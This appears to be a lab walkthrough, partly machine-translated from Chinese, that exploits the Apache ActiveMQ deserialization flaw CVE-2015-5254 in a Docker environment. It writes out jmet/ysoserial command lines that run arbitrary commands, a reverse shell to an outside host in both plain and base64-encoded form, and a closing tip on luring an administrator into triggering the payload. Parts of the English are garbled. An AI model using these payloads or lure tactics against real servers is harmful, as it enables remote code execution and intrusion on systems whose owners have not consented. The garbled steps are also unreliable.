Articles only learning to use, all the steps are from the network, bloggers can not identify whether a user using this website tutorials and software for real use, please use the user within the range permitted by domestic law,
once users for illegal use in violation of the relevant laws of the country regulations, all the negative consequences of independence borne by the users,
bloggers are not responsible nor liable for any direct et indirect or consequential.
* Text related to the associated vulnerability has been fixed and submitted to vendors, technology research and discussion paper only, is strictly prohibited for illegal purposes, or to bear all the consequences arising.
ActiveMQ deserialization vulnerability, CVE-2015-5254
Apache ActiveMQ is a US Apache (Apache) Software Foundation developed a set of open source messaging middleware, it supports Java Message Service, clusters, Spring Framework and so on.
Apache ActiveMQ before the 5.13.0 version 5.x security vulnerability, the vulnerability can be derived from the program does not limit the sequence of the proxy class. A remote attacker can make use of a special serialized Java Message Service (JMS) ObjectMessage objects exploit this vulnerability to execute arbitrary code.
Reference links:
Running Vulnerability environment: docker-compose up -d, appear done, explained vessel ran successfully
Enter the command, docker ps, you can view container information, see the opened port 8161 and 61616, where 61616 is a working port, the message is passed in this port; 8161 is the Web page management port. Access http://your-ip:8161
to see the web management page, but this loophole is theoretically do not need a web
Use jmet performed exploits. First, download the jmet jar file, and create an external folder (otherwise it might burst the wrong folder does not exist) in the same directory.
jmet principle is to use ysoserial generate and send Payload (ysoserial within their own jar, no longer need to download their own), so we need to ysoserial is a gadget that can be used to select, such as ROME.
jmet need JAVA support environment, if you can not install JAVA run, apt-get install openjdk-8-jre-headless. After the installation is complete, run java -version to see whether there is java version installed, there is information about successful installation instructions java
JAVA After the installation is complete, the installation jmet, execution
Opt to switch to the directory: cd / opt /
Download jemt: sudo wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar
Create a directory, mkdir external
Construction of pyload: java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch / tmp / xxx" -Yp ROME your-ip 61616, this pyload in drone / tmp / directory a file created under xxx
At this point the goal of ActiveMQ will add a named event queue by http://192.168.190.133:8161/admin/browse.jsp?JMSDestination=event we can see all the messages in the queue:
Click event will trigger the execution of the command
/ Tmp view the situation into the docker under
View container ID: docker ps
Into the container: docker exec -it container ID / bin / bash
View command completed successfully
Rebound shell
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -i >& /dev/tcp/192.168.190.134/8888 0>&1" -Yp ROME 192.168.190.133 61616
这里需要一些小技巧来绕过java的机制,bash -c {echo,payload的basse64编码}|{base64,-d}|{bash,-i}
完全构成的Pyload为:java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE5MC4xMzQvODg4OCAwPiYx}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.190.133 61616
shell反弹成功:
值得注意的是,通过web管理页面访问消息并触发漏洞这个过程需要管理员权限。在没有密码的情况下,我们可以诱导管理员访问我们的链接以触发,或者伪装成其他合法服务需要的消息,等待客户端访问的时候触发。
完